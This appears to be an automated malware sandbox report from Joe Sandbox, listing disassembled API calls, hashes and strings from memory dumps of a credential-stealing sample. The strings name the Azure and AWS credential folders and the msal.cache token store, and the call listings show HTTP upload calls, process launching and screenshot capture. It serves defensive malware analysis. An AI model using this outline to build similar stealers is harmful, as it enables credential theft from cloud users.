                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                        • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache$zaA
                        • API String ID: 4017274736-156832076
                        • Opcode ID: 9c612fc516eee28b221766771ad860b5795089092fef9f7b581a933fd2b7ea00
                        • Instruction ID: 18812f4626155d1e2a42465cb68794f5c6847905bec5d07e7ac1139e0e5490f3
                        • Opcode Fuzzy Hash: 9c612fc516eee28b221766771ad860b5795089092fef9f7b581a933fd2b7ea00
                        • Instruction Fuzzy Hash: 3141D6B9A4031467C710F7B0EC47FDD3738AB64704F404459B645660C2EEB897D98B9A
                        APIs
                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                          • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,024A8A30,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                          • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                          • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040CF83
                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040D0C7
                        • HeapAlloc.KERNEL32(00000000), ref: 0040D0CE
                        • lstrcatA.KERNEL32(?,00000000,024D9CC0,00421474,024D9CC0,00421470,00000000), ref: 0040D208
                        • lstrcatA.KERNEL32(?,00421478), ref: 0040D217
                        • lstrcatA.KERNEL32(?,00000000), ref: 0040D22A
                        • lstrcatA.KERNEL32(?,0042147C), ref: 0040D239
                        • lstrcatA.KERNEL32(?,00000000), ref: 0040D24C
                        • lstrcatA.KERNEL32(?,00421480), ref: 0040D25B
                        • lstrcatA.KERNEL32(?,00000000), ref: 0040D26E
                        • lstrcatA.KERNEL32(?,00421484), ref: 0040D27D
                        • lstrcatA.KERNEL32(?,00000000), ref: 0040D290
                        • lstrcatA.KERNEL32(?,00421488), ref: 0040D29F
                        • lstrcatA.KERNEL32(?,00000000), ref: 0040D2B2
                        • lstrcatA.KERNEL32(?,0042148C), ref: 0040D2C1
                        • lstrcatA.KERNEL32(?,00000000), ref: 0040D2D4
                        • lstrcatA.KERNEL32(?,00421490), ref: 0040D2E3
                          • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,024A5C80,?,0042110C,?,00000000), ref: 0041A82B
                          • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                        • lstrlenA.KERNEL32(?), ref: 0040D32A
                        • lstrlenA.KERNEL32(?), ref: 0040D339
                        • memset.MSVCRT ref: 0040D388
                          • Part of subcall function 0041AA70: StrCmpCA.SHLWAPI(00000000,00421470,0040D1A2,00421470,00000000), ref: 0041AA8F
                        • DeleteFileA.KERNEL32(00000000), ref: 0040D3B4
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocCopyDeleteProcessSystemTimememset
                        • String ID:
                        • API String ID: 2775534915-0
                        • Opcode ID: dd183b9a0ed49ba793ecf7e40d148ba4ed28fb7071b52f16157b1b0084ccc920
                        • Instruction ID: 94f9062ed3f4a6e26da847402fe0a382ec35b8ad99342330bde04fa79d6a5422
                        • Opcode Fuzzy Hash: dd183b9a0ed49ba793ecf7e40d148ba4ed28fb7071b52f16157b1b0084ccc920
                        • Instruction Fuzzy Hash: D2E17D75950108ABCB04FBE1DD96EEE7379BF14304F10405EF107B60A1DE38AA5ACB6A
                        APIs
                          • Part of subcall function 040BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 040BA9EF
                          • Part of subcall function 040BAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 040BAC2C
                          • Part of subcall function 040BAC17: lstrcpy.KERNEL32(00000000), ref: 040BAC6B
                          • Part of subcall function 040BAC17: lstrcat.KERNEL32(00000000,00000000), ref: 040BAC79
                          • Part of subcall function 040BAB07: lstrcpy.KERNEL32(?,00420E17), ref: 040BAB6C
                          • Part of subcall function 040B8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,040A1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FB4,00420E17), ref: 040B8DED
                          • Part of subcall function 040BAB87: lstrcpy.KERNEL32(00000000,?), ref: 040BABD9
                          • Part of subcall function 040BAB87: lstrcat.KERNEL32(00000000), ref: 040BABE9
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 040AD1EA
                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 040AD32E
                        • RtlAllocateHeap.NTDLL(00000000), ref: 040AD335
                        • lstrcat.KERNEL32(?,00000000), ref: 040AD46F
                        • lstrcat.KERNEL32(?,00421478), ref: 040AD47E
                        • lstrcat.KERNEL32(?,00000000), ref: 040AD491
                        • lstrcat.KERNEL32(?,0042147C), ref: 040AD4A0
                        • lstrcat.KERNEL32(?,00000000), ref: 040AD4B3
                        • lstrcat.KERNEL32(?,00421480), ref: 040AD4C2
                        • lstrcat.KERNEL32(?,00000000), ref: 040AD4D5
                        • lstrcat.KERNEL32(?,00421484), ref: 040AD4E4
                        • lstrcat.KERNEL32(?,00000000), ref: 040AD4F7
                        • lstrcat.KERNEL32(?,00421488), ref: 040AD506
                        • lstrcat.KERNEL32(?,00000000), ref: 040AD519
                        • lstrcat.KERNEL32(?,0042148C), ref: 040AD528
                        • lstrcat.KERNEL32(?,00000000), ref: 040AD53B
                        • lstrcat.KERNEL32(?,00421490), ref: 040AD54A
                          • Part of subcall function 040BAA87: lstrlen.KERNEL32(040A516C,?,?,040A516C,00420DDE), ref: 040BAA92
                          • Part of subcall function 040BAA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 040BAAEC
                        • lstrlen.KERNEL32(?), ref: 040AD591
                        • lstrlen.KERNEL32(?), ref: 040AD5A0
                        • memset.MSVCRT ref: 040AD5EF
                          • Part of subcall function 040BACD7: StrCmpCA.SHLWAPI(0064A350,040AAA0E,?,040AAA0E,0064A350), ref: 040BACF6
                        • DeleteFileA.KERNEL32(00000000), ref: 040AD61B
                        Memory Dump Source
                        • Source File: 00000000.00000002.2192376340.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
                        • String ID:
                        • API String ID: 1973479514-0
                        • Opcode ID: 35b3a7c6026b7343794acd9bc88f8a24a43edb670061b4873ce96399e81ec4f6
                        • Instruction ID: e2623fe34ebf5bfa4c91ba85ffe17aa3c8492cb51c60dda321cf3083f005ba64
                        • Opcode Fuzzy Hash: 35b3a7c6026b7343794acd9bc88f8a24a43edb670061b4873ce96399e81ec4f6
                        • Instruction Fuzzy Hash: F5E16C75A50208ABDB08FBE4DD94EEE7379BF14309F504159E146B60A0DF34BA08CFA6
                        APIs
                          • Part of subcall function 040BAA07: lstrcpy.KERNEL32(?,00000000), ref: 040BAA4D
                          • Part of subcall function 040A4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 040A4A51
                          • Part of subcall function 040A4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 040A4A68
                          • Part of subcall function 040A4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 040A4A7F
                          • Part of subcall function 040A4A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 040A4AA0
                          • Part of subcall function 040A4A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 040A4AB0
                          • Part of subcall function 040BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 040BA9EF
                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 040A5C5F
                        • StrCmpCA.SHLWAPI(?,0064A480), ref: 040A5C7A
                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 040A5DFA
                        • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00421A20,00000000,?,0064A0F0,00000000,?,0064A2F0,00000000,?,00421A1C), ref: 040A60D8
                        • lstrlen.KERNEL32(00000000), ref: 040A60E9
                        • GetProcessHeap.KERNEL32(00000000,?), ref: 040A60FA
                        • RtlAllocateHeap.NTDLL(00000000), ref: 040A6101
                        • lstrlen.KERNEL32(00000000), ref: 040A6116
                        • memcpy.MSVCRT(?,00000000,00000000), ref: 040A612D
                        • lstrlen.KERNEL32(00000000), ref: 040A613F
                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 040A6158
                        • memcpy.MSVCRT(?), ref: 040A6165
                        • lstrlen.KERNEL32(00000000,?,?), ref: 040A6182
                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 040A6196
                        • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 040A61B3
                        • InternetCloseHandle.WININET(00000000), ref: 040A6217
                        • InternetCloseHandle.WININET(00000000), ref: 040A6224
                        • HttpOpenRequestA.WININET(00000000,0064A49C,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 040A5E5F
                          • Part of subcall function 040BAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 040BAC2C
                          • Part of subcall function 040BAC17: lstrcpy.KERNEL32(00000000), ref: 040BAC6B
                          • Part of subcall function 040BAC17: lstrcat.KERNEL32(00000000,00000000), ref: 040BAC79
                          • Part of subcall function 040BAB07: lstrcpy.KERNEL32(?,00420E17), ref: 040BAB6C
                          • Part of subcall function 040BAB87: lstrcpy.KERNEL32(00000000,?), ref: 040BABD9
                          • Part of subcall function 040BAB87: lstrcat.KERNEL32(00000000), ref: 040BABE9
                        • InternetCloseHandle.WININET(00000000), ref: 040A622E
                        Memory Dump Source
                        • Source File: 00000000.00000002.2192376340.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocateConnectCrackFileProcessReadSend
                        • String ID:
                        • API String ID: 1703137719-0
                        • Opcode ID: 953f36d5d89b78922954f70e89b18a367f9e390412a3d758b9e507f35f40a690
                        • Instruction ID: 90d8003b19987e920682b0c2e9eae7ee79c5a2f7525ac9bbfa8060a151296c56
                        • Opcode Fuzzy Hash: 953f36d5d89b78922954f70e89b18a367f9e390412a3d758b9e507f35f40a690
                        • Instruction Fuzzy Hash: A8123F71A20218ABDB15EBA0DD94FEEB379BF14708F504199E14672091EF743B88CF94
                        APIs
                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                          • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                          • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,024DC7C0,00000000,?,0042144C,00000000,?,?), ref: 0040CA6C
                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040CA89
                        • GetFileSize.KERNEL32(00000000,00000000), ref: 0040CA95
                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040CAA8
                        • ??2@YAPAXI@Z.MSVCRT(-00000001), ref: 0040CAB5
                        • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040CAD9
                        • StrStrA.SHLWAPI(?,024DC4D8,00420B52), ref: 0040CAF7
                        • StrStrA.SHLWAPI(00000000,024DC580), ref: 0040CB1E
                        • StrStrA.SHLWAPI(?,024DD840,00000000,?,00421458,00000000,?,00000000,00000000,?,024D9BE0,00000000,?,00421454,00000000,?), ref: 0040CCA2
                        • StrStrA.SHLWAPI(00000000,024DD660), ref: 0040CCB9
                          • Part of subcall function 0040C820: memset.MSVCRT ref: 0040C853
                          • Part of subcall function 0040C820: lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,024D9C30), ref: 0040C871
                          • Part of subcall function 0040C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C87C
                          • Part of subcall function 0040C820: memcpy.MSVCRT(?,?,?), ref: 0040C912
                        • StrStrA.SHLWAPI(?,024DD660,00000000,?,0042145C,00000000,?,00000000,024D9C30), ref: 0040CD5A
                        • StrStrA.SHLWAPI(00000000,024D9AB0), ref: 0040CD71
                          • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B46), ref: 0040C943
                          • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B47), ref: 0040C957
                          • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B4E), ref: 0040C978
                        • lstrlenA.KERNEL32(00000000), ref: 0040CE44
                        • CloseHandle.KERNEL32(00000000), ref: 0040CE9C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$??2@BinaryCloseCreateCryptHandleReadSizeStringmemcpymemset
                        • String ID:
                        • API String ID: 3555725114-3916222277
                        • Opcode ID: 2438d76627bcbff543709c2f32cd44ca9ae5e95502dd009682462e2c21711f76
                        • Instruction ID: fb2464dfdb87d028b9341c66972094ccea7bc9213c5b9a6eafc00a4a54def107
                        • Opcode Fuzzy Hash: 2438d76627bcbff543709c2f32cd44ca9ae5e95502dd009682462e2c21711f76
                        • Instruction Fuzzy Hash: 2FE13E71911108ABCB14FBA1DC91FEEB779AF14314F40416EF10673191EF386A9ACB6A
                        APIs
                          • Part of subcall function 040BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 040BA9EF
                          • Part of subcall function 040BAB87: lstrcpy.KERNEL32(00000000,?), ref: 040BABD9
                          • Part of subcall function 040BAB87: lstrcat.KERNEL32(00000000), ref: 040BABE9
                          • Part of subcall function 040BAB07: lstrcpy.KERNEL32(?,00420E17), ref: 040BAB6C
                          • Part of subcall function 040BAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 040BAC2C
                          • Part of subcall function 040BAC17: lstrcpy.KERNEL32(00000000), ref: 040BAC6B
                          • Part of subcall function 040BAC17: lstrcat.KERNEL32(00000000,00000000), ref: 040BAC79
                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0064A63C,00000000,?,0042144C,00000000,?,?), ref: 040ACCD3
                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 040ACCF0
                        • GetFileSize.KERNEL32(00000000,00000000), ref: 040ACCFC
                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 040ACD0F
                        • ??2@YAPAXI@Z.MSVCRT(-00000001), ref: 040ACD1C
                        • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 040ACD40
                        • StrStrA.SHLWAPI(?,0064A1B0,00420B52), ref: 040ACD5E
                        • StrStrA.SHLWAPI(00000000,0064A364), ref: 040ACD85
                        • StrStrA.SHLWAPI(?,0064A4D0,00000000,?,00421458,00000000,?,00000000,00000000,?,0064A15C,00000000,?,00421454,00000000,?), ref: 040ACF09
                        • StrStrA.SHLWAPI(00000000,0064A4CC), ref: 040ACF20
                          • Part of subcall function 040ACA87: memset.MSVCRT ref: 040ACABA
                          • Part of subcall function 040ACA87: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 040ACAD8
                          • Part of subcall function 040ACA87: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 040ACAE3
                          • Part of subcall function 040ACA87: memcpy.MSVCRT(?,?,?), ref: 040ACB79
                        • StrStrA.SHLWAPI(?,0064A4CC,00000000,?,0042145C,00000000,?,00000000,0064A0DC), ref: 040ACFC1
                        • StrStrA.SHLWAPI(00000000,0064A5A8), ref: 040ACFD8
                          • Part of subcall function 040ACA87: lstrcat.KERNEL32(?,00420B46), ref: 040ACBAA
                          • Part of subcall function 040ACA87: lstrcat.KERNEL32(?,00420B47), ref: 040ACBBE
                          • Part of subcall function 040ACA87: lstrcat.KERNEL32(?,00420B4E), ref: 040ACBDF
                        • lstrlen.KERNEL32(00000000), ref: 040AD0AB
                        • CloseHandle.KERNEL32(00000000), ref: 040AD103
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2192376340.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$??2@BinaryCloseCreateCryptHandleReadSizeStringmemcpymemset
                        • String ID:
                        • API String ID: 3555725114-3916222277
                        • Opcode ID: 9842806969cad6799f0f7568e9bc81044bc23dbf52ae901b6399e5f6c005bae5
                        • Instruction ID: 238f985ba5ca777c0ca71609a4cac74fafe4f595f41c25ec3b0effec18902c05
                        • Opcode Fuzzy Hash: 9842806969cad6799f0f7568e9bc81044bc23dbf52ae901b6399e5f6c005bae5
                        • Instruction Fuzzy Hash: A7E12D72A10208ABDB15EBE4DD90EEEB779AF54308F044159F146B3191EF347A89CFA4
                        APIs
                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                        • RegOpenKeyExA.ADVAPI32(00000000,024DA0C0,00000000,00020019,00000000,004205B6), ref: 004183A4
                        • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00418426
                        • wsprintfA.USER32 ref: 00418459
                        • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0041847B
                        • RegCloseKey.ADVAPI32(00000000), ref: 0041848C
                        • RegCloseKey.ADVAPI32(00000000), ref: 00418499
                          • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseOpenlstrcpy$Enumwsprintf
                        • String ID: - $%s\%s$?
                        • API String ID: 3246050789-3278919252
                        • Opcode ID: 79a2fb80d974ac486e5468537c58b3e2968b3064256187bd92d5254366045701
                        • Instruction ID: f03ee3f6de4a678c4a24becac03c3675d5d4362b87af83515ad79f9b006405b7
                        • Opcode Fuzzy Hash: 79a2fb80d974ac486e5468537c58b3e2968b3064256187bd92d5254366045701
                        • Instruction Fuzzy Hash: B4813E75911118ABEB24DF50CD81FEAB7B9FF08714F008299E109A6180DF756BC6CFA5
                        APIs
                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                        • memset.MSVCRT ref: 00410C1C
                        • lstrcatA.KERNEL32(?,00000000), ref: 00410C35
                        • lstrcatA.KERNEL32(?,00420D7C), ref: 00410C47
                        • lstrcatA.KERNEL32(?,00000000), ref: 00410C5D
                        • lstrcatA.KERNEL32(?,00420D80), ref: 00410C6F
                        • lstrcatA.KERNEL32(?,00000000), ref: 00410C88
                        • lstrcatA.KERNEL32(?,00420D84), ref: 00410C9A
                        • lstrlenA.KERNEL32(?), ref: 00410CA7
                        • memset.MSVCRT ref: 00410CCD
                        • memset.MSVCRT ref: 00410CE1
                          • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,024A5C80,?,0042110C,?,00000000), ref: 0041A82B
                          • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                          • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,024A8A30,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                          • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                          • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                          • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                          • Part of subcall function 004196C0: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00410B85,?,00000000,?,00000000,004205C6,004205C5), ref: 004196E1
                        • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 00410D5A
                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00410D66
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                        • String ID: .exe
                        • API String ID: 1395395982-4119554291
                        • Opcode ID: 9d55e63f4d9d76d6cfe6b41b18adec1412689ce4735271c0c32cbc5a68951b40
                        • Instruction ID: 8c4414bd7b792449c86a3c64e171a12ac7102eaeec46e1acf96b3d3d4dd6cf75
                        • Opcode Fuzzy Hash: 9d55e63f4d9d76d6cfe6b41b18adec1412689ce4735271c0c32cbc5a68951b40
                        • Instruction Fuzzy Hash: A78194B55111186BCB14FBA1CD52FEE7338AF44308F40419EB30A66082DE786AD9CF6E
                        APIs
                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0041906C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateGlobalStream
                        • String ID: image/jpeg
                        • API String ID: 2244384528-3785015651
                        • Opcode ID: 58e7ea74754b36ef7d8ae6683782e5e72f3db2d118764dcc0ce216f86dba9a95
                        • Instruction ID: d6dc09ab2bfedf2d54b470b914d8c7211c5e4dd185e8bb692af35d1d417654b8
                        • Opcode Fuzzy Hash: 58e7ea74754b36ef7d8ae6683782e5e72f3db2d118764dcc0ce216f86dba9a95
                        • Instruction Fuzzy Hash: 7D711B75A40208BBDB04EFE4DC99FEEB7B9FB48300F108509F515A7290DB38A945CB65
                        APIs
                        • strtok_s.MSVCRT ref: 00411307
                        • strtok_s.MSVCRT ref: 00411750
                          • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,024A5C80,?,0042110C,?,00000000), ref: 0041A82B
                          • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: strtok_s$lstrcpylstrlen
                        • String ID:
                        • API String ID: 348468850-0
                        • Opcode ID: bde3d88e76cb374dc77a589280481c748b3d98596421ad73c644b27d853b8bc6
                        • Instruction ID: 4a233ae47f87f64f9a2ed81d2cca976e3c75948f423937a2df4e62cfbc7c3e06
                        • Opcode Fuzzy Hash: bde3d88e76cb374dc77a589280481c748b3d98596421ad73c644b27d853b8bc6
                        • Instruction Fuzzy Hash: C7C1D6B5941218ABCB14EF60DC89FEA7379BF54304F00449EF50AA7241DB78AAC5CF95
                        APIs
                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                        • ShellExecuteEx.SHELL32(0000003C), ref: 004131C5
                        • ShellExecuteEx.SHELL32(0000003C), ref: 0041335D
                        • ShellExecuteEx.SHELL32(0000003C), ref: 004134EA
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
